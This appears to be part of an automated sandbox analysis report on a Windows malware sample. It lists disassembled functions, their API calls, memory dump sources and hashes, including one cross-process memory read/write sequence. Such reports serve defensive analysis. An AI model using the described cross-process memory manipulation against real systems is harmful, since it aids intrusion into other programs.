                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                                  • Opcode ID: 81c7b2b24b9b3a5f33f24b32ca22c04fbac172f9e344d151e2898eaec86139d6
                                                                                                                                                                  • Instruction ID: af4877909a0c89ab29b6385e9653eebc6db12eb0013d0dbea4b9cd4d3f61d40b
                                                                                                                                                                  • Opcode Fuzzy Hash: 81c7b2b24b9b3a5f33f24b32ca22c04fbac172f9e344d151e2898eaec86139d6
                                                                                                                                                                  • Instruction Fuzzy Hash: BB018631910709ABEB619F10EE4EBD677B8FF10705F044169F197A54E1DBF4A9948E40
                                                                                                                                                                  Function 001FB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EndPath.GDI32(?), ref: 001FB526
                                                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,0025F583,00000000,?), ref: 001FB542
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 001FB555
                                                                                                                                                                  • DeleteObject.GDI32 ref: 001FB568
                                                                                                                                                                  • StrokePath.GDI32(?), ref: 001FB583
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                                                  • Opcode ID: 1d0baea68fb79830cf9d82adc97647483ecb66965ad7d5f8c4aecad4a1c0f4c4
                                                                                                                                                                  • Instruction ID: 1398fe95d3cdc58bebd23c36da9233816e03deb69d63efcf338fc1163c1d650d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d0baea68fb79830cf9d82adc97647483ecb66965ad7d5f8c4aecad4a1c0f4c4
                                                                                                                                                                  • Instruction Fuzzy Hash: C6F0B230605248EFEB159F25FD4C7643BA5AB12372F188214E5A9481F0CBBD89AADF10
                                                                                                                                                                  Function 0022FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0022FAB2
                                                                                                                                                                  • CoCreateInstance.COMBASE(0026DA7C,00000000,00000001,0026D8EC,?), ref: 0022FACA
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0022FD2D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                                                  • Opcode ID: aa82ed68fc2547b0d0b255fa0315f651cfbec4402ec64b3fa057bf86e897f9ea
                                                                                                                                                                  • Instruction ID: c760b82e9a5750fa93772f6db0b74724a253735fe671e963fce8d9d72d072877
                                                                                                                                                                  • Opcode Fuzzy Hash: aa82ed68fc2547b0d0b255fa0315f651cfbec4402ec64b3fa057bf86e897f9ea
                                                                                                                                                                  • Instruction Fuzzy Hash: E9A14A71504205AFD300EFA4C891EAFB7EDAF98704F40492DF155D71A2EB70EA0ACB92
                                                                                                                                                                  Function 001FDA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: #$+
                                                                                                                                                                  • API String ID: 0-2552117581
                                                                                                                                                                  • Opcode ID: 8a99e522b3d985dceb98014cbdb61718ebc5d0ec06aede5f556b9e3e75279459
                                                                                                                                                                  • Instruction ID: e5e3ffbb03722601eeffd20551552be4dbd282896883c52cb5edf37a38a2646e
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a99e522b3d985dceb98014cbdb61718ebc5d0ec06aede5f556b9e3e75279459
                                                                                                                                                                  • Instruction Fuzzy Hash: 8851537510425ADFCF15EF68D844AFEBBA0EF26315F244051FC819B2A0D7309DAACB28
                                                                                                                                                                  Function 0022503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0027DC40,?,0000000F,0000000C,00000016,0027DC40,?), ref: 0022507B
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 001EB8A7: _memmove.LIBCMT ref: 001EB8FB
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002250FB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                                                                  • API String ID: 2528338962-776492005
                                                                                                                                                                  • Opcode ID: 686e92c16672d029353de3e226b1bd2eb1fa1f46d03f2686d1a84a0277adc47a
                                                                                                                                                                  • Instruction ID: 376f3aea091d6eb62624f87701f89362016f4550b5ef227ed8bfd79e3eb5fbd2
                                                                                                                                                                  • Opcode Fuzzy Hash: 686e92c16672d029353de3e226b1bd2eb1fa1f46d03f2686d1a84a0277adc47a
                                                                                                                                                                  • Instruction Fuzzy Hash: 58419234A10A2AAFCF00DF94D885AAEB7B5BF48304F04C059E95AAB392D7749D61CB50
                                                                                                                                                                  Function 0021CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00224D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0021C9FE,?,?,00000034,00000800,?,00000034), ref: 00224D6B
                                                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0021CFC9
                                                                                                                                                                    • Part of subcall function 00224D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0021CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00224D36
                                                                                                                                                                    • Part of subcall function 00224C65: GetWindowThreadProcessId.USER32(?,?), ref: 00224C90
                                                                                                                                                                    • Part of subcall function 00224C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0021C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00224CA0
                                                                                                                                                                    • Part of subcall function 00224C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0021C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00224CB6
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0021D036
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0021D083
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                                                  • Opcode ID: 4ce1efaa349c9d3b4ee2f88444f1e55f591b6bfe18197040e0942129f5c13474
                                                                                                                                                                  • Instruction ID: 8e750cc93f43a55edc72b8f4b6076e7740d941e5e759ff821823b1c9d3cc65d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ce1efaa349c9d3b4ee2f88444f1e55f591b6bfe18197040e0942129f5c13474
                                                                                                                                                                  • Instruction Fuzzy Hash: 12413C76900228BEDB11EFA4DC85FDEB7B8AF49700F108095EA45B7181DA706E99CB61
                                                                                                                                                                  Function 0024A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0027DBF0,00000000,?,?,?,?), ref: 0024A4E6
                                                                                                                                                                  • GetWindowLongW.USER32 ref: 0024A503
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0024A513
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long
                                                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                                                  • Opcode ID: dca8b0157302e86d5b559050908ca8b9809b57c22f5186c6d43187470baf1d54
                                                                                                                                                                  • Instruction ID: c4440d8efb66bd33e8ccb86c5b0e4fc4ac35f4526cafc5b28e85ca7d173a7822
                                                                                                                                                                  • Opcode Fuzzy Hash: dca8b0157302e86d5b559050908ca8b9809b57c22f5186c6d43187470baf1d54
                                                                                                                                                                  • Instruction Fuzzy Hash: D131EE3165060AAFDB259F38CC45BEA7BA9FF49334F208314F875A21E0C770E8609B50
                                                                                                                                                                  Function 002357D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 002357E7
                                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0023581D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                                                  • String ID: ?K#$|
                                                                                                                                                                  • API String ID: 1413715105-991306622
                                                                                                                                                                  • Opcode ID: 29f4940dc88364e1ba99aee4d40623502548eb084735311628ded7019888e3ca
                                                                                                                                                                  • Instruction ID: 99b5bc55c6aab9b09ff5d01b4e8f9b917f53ba12c4f0914ae652ef4b56e23f20
                                                                                                                                                                  • Opcode Fuzzy Hash: 29f4940dc88364e1ba99aee4d40623502548eb084735311628ded7019888e3ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 21313C71C10119EBCF11AFA1CC95EEEBFB9FF28300F104019F819A6162DB319A56CB60
                                                                                                                                                                  Function 0024A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0024A74F
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0024A75D
                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0024A764
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                                                  • Opcode ID: 20e306a84507ead32b314fd572178e1eceb5723841eb85a43833c1e8459af2c0
                                                                                                                                                                  • Instruction ID: 6529287a236be75bc6c0182e54d3f2cd0ba63d6200989a7d07e23b81c685f64d
                                                                                                                                                                  • Opcode Fuzzy Hash: 20e306a84507ead32b314fd572178e1eceb5723841eb85a43833c1e8459af2c0
                                                                                                                                                                  • Instruction Fuzzy Hash: CE2192B5610209AFEB14DF68DCC5EAB77ADEF4A7A4B040059F90197251CB70EC21CAA1
                                                                                                                                                                  Function 002497B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0024983D
                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0024984D
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00249872
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                                                  • String ID: Listbox
                                                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                                                  • Opcode ID: ae5dd244e571e799139f5d9d9ff09d89d3aeafbd0a6694a82493b6eb928f82ea
                                                                                                                                                                  • Instruction ID: a5a5a4f3ecfff8685cb2aef5b2866eec11189e410f701499bbb617e78286ca42
                                                                                                                                                                  • Opcode Fuzzy Hash: ae5dd244e571e799139f5d9d9ff09d89d3aeafbd0a6694a82493b6eb928f82ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E21F971620119BFEF158F58DC85FBB3BAEEF8A764F018124F9059B190C6719C61CBA0
                                                                                                                                                                  Function 0024A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0024A27B
                                                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0024A290
                                                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0024A29D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                                                  • Opcode ID: a6edc4a92de84118d58f07737950bcf4f85440357c107e7e3f067b899ff519b8
                                                                                                                                                                  • Instruction ID: f9b6ed6f9f2ca5ca75518a21c4feb5301e1e5c92b40eeffc576e53c98c20489a
                                                                                                                                                                  • Opcode Fuzzy Hash: a6edc4a92de84118d58f07737950bcf4f85440357c107e7e3f067b899ff519b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 55112371250208BFEF249F74CC06FA73BA8EF89B14F024118FA41A6090C2B2A821DB60
                                                                                                                                                                  Function 00202F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00202F79
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000), ref: 00202F80
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                                                  • API String ID: 1029625771-340411864
                                                                                                                                                                  • Opcode ID: 0222b98ad98290c7d318bc85ea96d2fb0d7804c8d47f753210fa7ee8b9c9523c
                                                                                                                                                                  • Instruction ID: a6b541a0e761d39fb25df8a3df4a789a8e1c1d6cb35a098e56da2222c0538cd4
                                                                                                                                                                  • Opcode Fuzzy Hash: 0222b98ad98290c7d318bc85ea96d2fb0d7804c8d47f753210fa7ee8b9c9523c
                                                                                                                                                                  • Instruction Fuzzy Hash: 0BE01A74BA4306ABDF905F71FC8EB953664A706746F104065F10AD50E0CFB54464EF45
                                                                                                                                                                  Function 00203034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00202F4E), ref: 0020304E
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000), ref: 00203055
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
